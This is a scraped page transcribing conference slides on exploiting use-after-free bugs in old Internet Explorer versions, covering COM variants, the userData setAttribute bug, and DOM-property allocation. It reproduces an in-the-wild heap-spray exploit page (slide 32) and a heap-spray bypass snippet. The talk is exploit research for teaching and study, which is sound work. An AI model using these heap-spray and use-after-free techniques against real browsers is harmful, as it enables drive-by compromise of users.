aleatory persistent threat
play

Aleatory Persistent Threat A short story by Nico Waisman - PowerPoint PPT Presentation

Dec 24, 2023 •42 likes •862 views

Aleatory Persistent Threat A short story by Nico Waisman nicolas@immunityinc.com Twitter: @nicowaisman Aleatoricism is the creation of art by chance, exploiting the principle of randomness. The word derives from the Latin word alea, the

  1. Aleatory Persistent Threat A short story by Nico Waisman nicolas@immunityinc.com Twitter: @nicowaisman

  2. Aleatoricism is the creation of art by chance, exploiting the principle of randomness. The word derives from the Latin word alea, the rolling of dice.

  3. The time of remotes ruling the earth, is gone

  4. Servers got protected. Servers got protected. The world got cold The world got cold

  5. BROWSER BUGS!!!

  6. Advanced Persistent Threat

  7. Advanced ● Stealth ● Robustness ● Reliability

  8. Persistent Threat

  9. How does 0day get How does 0day get caught in the wild? caught in the wild?

  10. How does 0day get caught in the wild? ● IDS Protection ● Honeypots ● Unreliable Exploits

  11. Use after free Since the advance of software protection, developer education and compiler improvements, memory corruption bugs are dying. But browser use-after-free bugs are a very crude reality

  12. Use after free “ A use-after-free occurs when memory is used after it was previously deallocated.”

  13. Finding Use after free ● Method/Property retaining an object without incrementing the reference. ● Shallow copies (Aurora) ● Reference desynchronization ● Incorrect API usage Check out BH 2009: Attacking Interoperability (Dowd, Smith and Dewey)

  14. Exploiting Use after free 101 Allocation To be continued...

  15. COM: Component Object Model ● Language-central way of implementing objects ● Objects responsible for their own creation ● Maintenance of reference counter ● Widely used in Microsoft Languages

  16. COM: IUnknown All COM components must implement IUnknown interface

  17. OLE Automation ● Created by Microsoft to provide an interface to automate controllers ● Designed originally for scripting languages ● Allows you to access/call properties/methods by “names”

  18. OLE Automation Must implement the IDispatch interface

  19. OLE Automation bstrName = SysAllocString(OLESTR("cat")); hr = pObj->GetDispID(bstrName, 0, &dispid); hr = pObj->InvokeEx(dispid, LOCALE_USER_DEFAULT, DISPATCH_PROPERTYGET, &dispparamsNoArgs, &var, NULL, NULL);

  20. OLE Automation Must implement the IDispatch interface

  21. Variants ● Commonly used in jscript to communicate with COM objects ● Data type containing a type field and a union member used as a generic variable

  22. Variants ● Variants can also reference objects e.g. idispatch pointers: #define VT_DISPATCH 9 IDispatch __RPC_FAR* pdispVal;

  23. Variant manipulation VariantInit(var *) Initializes the VARIANT by setting it to VT_EMPTY VariantClear( var*) Clears the VARIANT, if the VARIANT type is VT_DISPATCH, it will be Release()'d VariantCopy(var *source, var *dest) Clears the destination VARIANT and copies the source to it, increments the reference by one

  24. Variant manipulation VarianChangeType(var dest, var src, short wFlags, VARTYPE vt) Converts a VARIANT from SRC type to the type indicated in the VT argument. Clears the destination before copying the content

  25. IE_PEERs ● The bug was being exploited in the wild ● Payload downloaded and executed a binary file from notes.topix21century.com ● GLOBAL HIGH SECURITY RISK!!(tm) ● Deeper research showed that the “A” in APT was for Aleatory

  26. IE_PEERs ● IE 5.5 introduces DHTML Behaviors ● “Behaviors are components that encapsulate specific functionality or behavior on a page.” ● e.g. Enhance a web element behavior

  27. IE_PEERs ● One of the default behaviors was Persistence ● Persistence enables authors to specify an object to persist on the client during the current and later sessions ● “userData” persists page state and information within an XML store, a hierarchical data structure

  28. IE_PEERs setAttribute(sAttrName, vAttrValue) Set the value of a specific attribute To persist the vAttrValue, it calls VariantChangeTypeEx to transform the source into a string. It passes the same variable as source and destination arguments

  29. IE_PEERs

  30. RECAPITULATING ● Use after free is all about playing with the REF counter ● Exploiting seems trivial, you just replace the free chunk with something useful

  31. Aleatory Persistent Threat

  32. <html> <body> <button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"> </button> <script language="JavaScript" src="bypasskav.txt"> </script> <script language="JavaScript"> function eejeefe(){ var s=unescape("%u0c0c"); var u=unescape("%u0c0c"); var c=s+u; var array = new Array(); var ls = 0x86000-(c.length*2); var b = unescape("%u0c0c%u0c0C"); while(b.length<ls/2){ b+=b; } var lh = b.substring(0,ls/2); delete b; for(i=0;i<270;i++) { array[i] = lh + lh + c;} } function blkjbdkjb(){ Fail #1 eejeefe(); var sdfsfsdf = document.createElement("BODY"); sdfsfsdf.addBehavior("#default#userData"); document.appendChild(sdfsfsdf); try { Fail #2 for (i=0;i<10;i++) { sdfsfsdf.setAttribute('s',window); } }catch(e) {} Fail #3 window.status+=''; } document.getElementById("helloworld").onclick(); </script> </body> </html>

  33. Chunk Norris fact #1 “HEAP SPRAY MAKES EXPLOIT WRITERS DULL BOYS”

  34. Randomness But WHY does it still “work”? Heap spray

  35. Pray after free

  36. Pray after free 1) Free object gets randomly allocated with a string or something else, that ends up pointing to heap spray controlled memory 2) Free object gets the vtable LSB modified by LFH USERBLOCK offset (more on this later), which somehow ends up pointing to heap spray controlled memory

  37. Pray after free

  38. Pray after free (analogies)

  39. Like going to war with a Russian roulette gun

  40. Like looking for porn in ChatRoulette

  41. Use after free (the right way)

  42. 1) Understand what you are freeing Understand what you are freeing: a) Can it be controlled? b) Find out the precise size of the object!

  43. 1) Understand what you are freeing ● Every javascript object in mshtml.dll (documents, window, elements, etc) is represented via a Tear Off Interface ● A Tear Off interface works as a wrapper for the other objects, creating the real object only when a client needs it and maintaining references.

  44. 1) Understand what you are freeing Tear Off objects are the ones passed to setAttribute

  45. 2) Replacement with controlled data ● Objects contain the vtable pointer as the first DWORD in memory. Jscript strings cannot be used anymore as they are layed out as: DWORD Size + String ● Possible alternative: Checking DOM Element Properties/Methods allocation ● Insert your own idea

  46. Element properties (static analysis) ● Every Element inherits from CElement and as a consequence from Cbase. ● Every Element should override the GetClassDesc method which returns information about the Element.

  47. Element properties (static analysis) CLASS DESC […] *HDLDESC HDLDESC […] StringTableAggregate **Celement_StringTable **CXXXXX_StringTable

  48. Element properties (static analysis) ● StringTable holds a big array of CAssocVTable structures with the info about every property ● CBase::GetDispID and Cbase::InvokeEx widely use CAssocVTable to internally find every property setter/getter

  49. CAssocVTable DWORD *PropDesc DWORD val PropDesc BYTE wIIDIndex_function DWORD *HandleProperty BYTE wIIDIndex_UUID WCHAR *pstrName SHORT wIndex WCHAR *pstrExposedName DWORD hash […] DWORD dwPPFlag DWORD dispID DWORD dwFlags WORD wInvFunc WORD wMaxstrLen *Getter() *Setter()

  50. Element properties (static analysis) ● Property setter/getter is obtained by calling an argument setting function: uuid = UUID_LIST[ CassocVTable->wIIDIndex_UUID ] object = Cbase::QueryInterface(uuid) function_index = CassocVTable->wIIDIndex_function FUNC_LIST[PropDesc->WInvFunc]( object, function_ndx , ...) The property function is: object->vtable + 0x1C + function_ndx*4

  51. Element properties (static analysis)

  52. Element properties (dynamic analysis) Dispid + Property name GetDispID InvokeEx Set Allocation hooks Log by dispid RtlAllocateHeap Size + Mem RtlFreeHeap Mem InvokeEx (ret) Show results

  53. Element properties (dynamic analysis) var c = document.createElement( "P" ); for(var x in c) { try { c[x] = “COCACOLA”; } catch (e) { } }

  54. Element properties (dynamic analysis)

  55. Element properties (dynamic analysis) var c = document.createElement( "P" ); for(var x in c) { try { c[x] = “COCACOLA”; } catch (e) { } }

  56. Use after free Exploitation is now trivial: ● Free the object ● Allocate chunks through DOM properties ● Use the object The vtable is under our control, at which point heap spraying now makes sense

  57. Chunk Norris fact #2 “WINNERS USE HEAP SPRAY CONCIOUSL Y ”

  58. Heap Spray IE 8 introduced a weak Heap Spray protection. Trivially bypassed with a small tweak: h1[0] = nops + shellcode; for (var i = 1 ; i < 100 ; i++) { h1[i] = h1[0].substring(0, h1[0].length ) }

  59. Exploiting Use after free (in a non traditional way)

Recommend

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez , Xiaolin Chang , Xiaodan Li , Kishor S. Trivedi Ricardo J. Rodr rjrodriguez@unizar.es , xlchang@bjtu.edu.cn , { xiaodan.li,ktrivedi }

420 views • 26 slides
(or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced,

(or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced,

The Advanced Persistent Threat (or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced, Persistent Threat? Increasingly sophis5cated cyber aIacks by hos5le organiza5ons with the goal of: Gaining

872 views • 50 slides
Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon Supervisors: Marco Davids, Christian Hesselman (SIDN) About Advanced Persistent Threats Advanced Persistent Threat (APT) [2]; Highly skilled and

342 views • 32 slides
Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010

Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010

Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010 Wednesday, October 20, 2010 Outline of the memo you read Persistence and persistent reference Gambling / trust Threat model Prevention

612 views • 20 slides
to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

Fake Antivirus- Journey from Trojan to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection Vectors Packer Evolution How do they work ? DeepSec 2011 Introduction Fake AntiVirus (FakeAV) is a

794 views • 51 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
Assessment What is Threat Assessment Threat assessment is the process of gathering

Assessment What is Threat Assessment Threat assessment is the process of gathering

Threat Assessment What is Threat Assessment Threat assessment is the process of gathering information to understand the threat of violence posed by a person. Threat management is the process of developing and executing plans to mitigate

332 views • 15 slides
Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to

Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to

Honeymoon Threat Restoration Rescue Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to normal living. A disaster has not yet oc- curred, but there is a sense of impending doom. Individual

604 views • 6 slides
What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

DDoS &amp; Modern Threat Motives Dan Holden Director, ASERT What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape Geo-poli:cal More defenses ? App/Content t a

1.13k views • 44 slides
Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory

Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory

Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory (PM/NVM) CPU Byte Addressable Persistent Cache Low Latency Capacity Cost effective PM DRAM 2 Many PM Work, but All in Single Machine

712 views • 33 slides
Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be

Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be

Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be defined as: A person whose immediate activity can cause death and/or serious injury An active threat can involve a firearm or another

395 views • 15 slides
Assessment of sinoatrial node function at patients with persistent and long-standing persistent

Assessment of sinoatrial node function at patients with persistent and long-standing persistent

Assessment of sinoatrial node function at patients with persistent and long-standing persistent forms of atrial fibrillation after Maze III procedure combined with a mitral valve operation A.A. Kulikov, L.A. Bokeria Bakoulev Scientific Center

267 views • 12 slides
Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los

Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los

Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los Chief Security Evangelist HP Software Shane MacDougall Principal Tactical Intelligence Modern threat modeling is a defensive response to

783 views • 52 slides
Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats

Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats

Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats New class of threat actors called Advanced Persistent Threat (APT) Data compromised for economic or military advancement Conventional

701 views • 32 slides
Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo

Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo

Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo Cintra, Stratis Viglas NVMW 2019 Persistent Memory Systems L1 L1 LLC Persistent Memory 2 Persistent Memory Systems L1 L1 Persistent

1.1k views • 70 slides
Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect

Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect

Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect Multi-phase approach Initially: create Cyber Domain PIM and S TIX PS M with UML Profile for NIEM Expand to other PS M, create Threat Meta

211 views • 10 slides
Logging in Persistent Memory: to Cache, or Not to Cache? Mengjie Li, Matheus Ogleari , Jishen Zhao

Logging in Persistent Memory: to Cache, or Not to Cache? Mengjie Li, Matheus Ogleari , Jishen Zhao

Logging in Persistent Memory: to Cache, or Not to Cache? Mengjie Li, Matheus Ogleari , Jishen Zhao Persistent Memory STT-RAM, PCM, Memory CPU CPU ReRAM, NVDIMM, Battery-backed Load/store DRAM NVRAM DRAM, etc. Not persistent Persistent

308 views • 20 slides
Proposed Low-Threat Petroleum UST Closure Policy SWRCB Low-Threat UST Closure Policy Task Force

Proposed Low-Threat Petroleum UST Closure Policy SWRCB Low-Threat UST Closure Policy Task Force

Proposed Low-Threat Petroleum UST Closure Policy SWRCB Low-Threat UST Closure Policy Task Force Los Angeles RWQCB Presentation September 15, 2011 Prologue Low-Threat Policy: An Evolutionary Process STATE WATER RESOURCES CONTROL BOARD

528 views • 31 slides
Persistent Handles: approaches Ralph Bhme, Samba Team, SerNet 2018-06-08 Outline Persistent

Persistent Handles: approaches Ralph Bhme, Samba Team, SerNet 2018-06-08 Outline Persistent

Persistent Handles: approaches Ralph Bhme, Samba Team, SerNet 2018-06-08 Outline Persistent Handles: Recap Persistent Handles: Samba dbwrap approach ctdb approach Persistent Handles: implementation (with dbwrap) VFS approach Outlook The

586 views • 43 slides
Web Security What should be the Threat Model for the Web? Goal and Threat Model Much can go

Web Security What should be the Threat Model for the Web? Goal and Threat Model Much can go

Web Security What should be the Threat Model for the Web? Goal and Threat Model Much can go wrong on the web! Clients encounter malicious content Web servers are target of break-ins Fake content/servers trick users Data sent

446 views • 16 slides
Integrated Threat Management Appliance 1 http://www.youtube.com/watch?v=F 7pYHN9iC9I 2 3

Integrated Threat Management Appliance 1 http://www.youtube.com/watch?v=F 7pYHN9iC9I 2 3

Integrated Threat Management Appliance 1 http://www.youtube.com/watch?v=F 7pYHN9iC9I 2 3 Denial of Service Attack (DoS) 4 THREAT CATEGORY THREAT ACTION TYPE Malware/Badware Send data to the external entity/site, Trapdoor/Backdoor Entry,

719 views • 23 slides
Persistent Bioperl Persistent Bioperl BOSC 2003 Hilmar Lapp Genomics Institute Of The Novartis

Persistent Bioperl Persistent Bioperl BOSC 2003 Hilmar Lapp Genomics Institute Of The Novartis

Persistent Bioperl Persistent Bioperl BOSC 2003 Hilmar Lapp Genomics Institute Of The Novartis Research Foundation San Diego, USA Acknowledgements Acknowledgements Bio* contributors and core developers Aaron, Ewan, ThomasD, Matthew,

534 views • 30 slides
Threat Models CS 5431 February 10, 2017 Threat Models Threats (CS 5430)

Threat Models CS 5431 February 10, 2017 Threat Models Threats (CS 5430)

Introduction Threat Models CS 5431 February 10, 2017 Threat Models Threats (CS 5430) Inquisitive people, unintentional blunders Hackers driven by technical challenges Disgruntled employees or

357 views • 23 slides
How to use soft OA methods to explore future IED threat and their countermeasures 27 ISMOR

How to use soft OA methods to explore future IED threat and their countermeasures 27 ISMOR

How to use soft OA methods to explore future IED threat and their countermeasures 27 ISMOR 2010 Introduction Cause Current threat around IEDs is continuously changing Little known about possible future threat Goal List

210 views • 16 slides

More recommend